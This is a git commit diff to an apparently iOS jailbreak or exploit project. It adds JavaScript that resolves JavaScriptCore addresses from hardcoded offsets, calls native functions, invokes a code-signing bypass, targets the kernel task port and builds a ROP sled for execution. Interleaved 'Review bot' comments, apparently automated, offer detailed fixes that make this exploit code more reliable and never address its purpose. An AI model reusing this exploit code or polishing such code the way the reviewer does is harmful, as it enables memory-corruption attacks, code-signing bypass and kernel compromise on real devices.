authorspv420 <unomilliono@gmail.com>2022-05-31 19:51:14 -0400
committerspv420 <unomilliono@gmail.com>2022-05-31 19:51:14 -0400
commitb040db45dfc9ef9a902e48bc2718a94cd099f505 (patch)
tree7b361fbd03f866b225473a54f837ec388f9fa4fb /src/js/main.js
parentfe765137cd79a671dc3e6932bb867ef333611e73 (diff)
I live in a constant state of fear and misery
Do you miss me anymore? And I don't even notice When it hurts anymore Anymore Anymore Anymore
Diffstat (limited to 'src/js/main.js')
-rw-r--r--src/js/main.js93
1 files changed, 92 insertions, 1 deletions
diff --git a/src/js/main.js b/src/js/main.js
index 7021ab1..c6ceba0 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -19,6 +19,8 @@ var PROT_EXEC = 0x4;
var MAP_PRIVATE = 0x2;
var MAP_ANON = 0x1000;
+var victim = {a: 13.37};
+
/*
* leftover shit from jsc_fun, used to be using `log`
*/
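Review bot: `victim` is looked up by name on the JSC global object later in this same commit (`scall("JSObjectGetProperty", ..., string_ref, ...)` with the string "victim"), so it only works because it is a top-level `var` that becomes a property of the global object; a `let`/`const` or a declaration inside main() would not, and the lookup would quietly return nothing useful. Nothing on the line records that dependency. I would write `var victim = {a: 13.37}; // found by name via JSObjectGetProperty on the global object — must stay a top-level var` so it survives a tidy-up.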
@@ -32,6 +34,10 @@ try {
puts = function (){};
}
+var JSStringCreateWithUTF8CString = 0x239f9d0d;
+var JSObjectGetProperty = 0x239fa411;
+var JSContextGetGlobalObject = 0x239f8dfd;
+
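Review bot: The three JavaScriptCore addresses added in this hunk are bare unslid numbers with nothing recording which OS build or shared-cache they were dumped from, so on any other build they become arbitrary call targets rather than a visible failure. A header comment would at least make the hazard explicit, e.g. `// unslid dyld_shared_cache addresses of JSC exports, dumped from one specific build — re-dump on any OS change; low bit set is presumably the Thumb bit, as with the gadget offsets below`. If the project already has a runtime symbol-resolution path feeding `sym_cache`, using it for these three instead of constants would remove the problem; I cannot see such a helper from this hunk, so that part is a suggestion.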
function main() {
/*
* get slide and calculate slid base
@@ -48,6 +54,8 @@ function main() {
init_sptr_heap();
+ scall("printf", "%x %x %x %x", 0x41, 0x42, 0x43, 0x44);
+
puts("we out here");
puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
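Review bot: The `scall("printf", "%x %x %x %x", 0x41, 0x42, 0x43, 0x44)` added here has no trailing newline, so its output runs straight into the following `puts("we out here")` on the same line, and the four unlabeled hex values give no hint what is being probed. If this is a check that scall passes four integer arguments correctly, label it and terminate it: `scall("printf", "scall arg check (expect 41 42 43 44): %x %x %x %x\n", 0x41, 0x42, 0x43, 0x44);`. If it is a leftover from debugging, drop it rather than leaving an unconditional call in main().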
@@ -56,9 +64,92 @@ function main() {
printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
printf("*(uint32_t*)base = 0x%x\n", read_u32(base));
- var tfp0 = get_kernel_task();
+ var dyld_shc_slide = get_dyld_shc_slide();
+
+ sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
+ sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
+ sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
+
+ prep_shit();
+ large_buf[0] = 0x41424344;
+ printf("%x\n", read_u32(large_buf_ptr));
+
+ csbypass();
+
+ return;
+
+ var tfp0 = get_kernel_task();
+
printf("tfp0=%x\n", tfp0);
+
+ return;
+
+ printf("dead?\n");
+ var string_ref = scall("JSStringCreateWithUTF8CString", sptr("victim"));
+ printf("dead? %x\n", string_ref);
+ var global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+ printf("dead? %x\n", global_object);
+ var jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+ printf("dead?\n");
+
+ printf("%x\n", jsobj_addr);
+// printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));
+ victim.target = parent;
+ printf("%x\n", read_u32(jsobj_addr + 0x18));
+// printf("%s\n", prim_dump_u32(read_buf(jsobj_addr - 0x10, 0x60), jsobj_addr - 0x10));
+// printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0'));
+
+ /*
+ UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"ROFL"
+ message:@"Dee dee doo doo."
+ delegate:self
+ cancelButtonTitle:@"OK"
+ otherButtonTitles:nil];
+ [alert show];
+ */
+
+ return;
+
+ var rop_buf = new Array();
+ var nop = (0x781a | 1) + slid;
+ var zero_arr = [].slice.call(u32_to_u8x4(0));
+ var nop_arr = [].slice.call(u32_to_u8x4(nop));
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(nop);
+ for (var i = 0; i < 0x40000; i++) {
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(nop);
+ if (i % 0x1000 == 0) {
+ printf("%x\n", i);
+ }
+ }
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0);
+ rop_buf.push(0x41414141);
+
+ printf("gen'd buf\n");
+
+// printf("%s\n", rop_buf[0].toString(16));
+
+ printf("exec'ing\n");
+ exec_rop(rop_buf);
+ printf("done\n");
+
+// var tfp0 = get_kernel_task();
+
+// printf("tfp0=%x\n", tfp0);
return;
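Review bot: The bare `return;` right after `csbypass();` makes everything below it in this hunk unreachable — the `get_kernel_task()` call, the JSObjectGetProperty lookup and the whole ROP-sled build — and the two further `return;` lines inside that dead region mean main() now carries three exits with nothing explaining which stage is meant to run. If this is staged development, a single explicit switch reads far better than scattered returns, e.g. `var STAGE = 1; // 1: csbypass only, 2: tfp0, 3: JSC object lookup, 4: ROP sled` with `if (STAGE < 2) return;` at each cut point. Two things in the dead code will bite once it is re-enabled: `NULL` is not a JavaScript identifier and will throw a ReferenceError unless the project defines it somewhere outside this hunk (`0` is the safe spelling for the null exception pointer), and `victim.target = parent;` assigns the browser's `window.parent` if `parent` is not a local defined elsewhere, which looks unintended. The offset in `read_u32(slid + reserve_addr + 0x44)` is repeated twice with no name; hoisting it as `var ctx = read_u32(slid + reserve_addr + 0x44); // JSContextRef appears to be cached at reserve+0x44 — confirm` documents both the value and the assumption. main() continues past the end of the hunk.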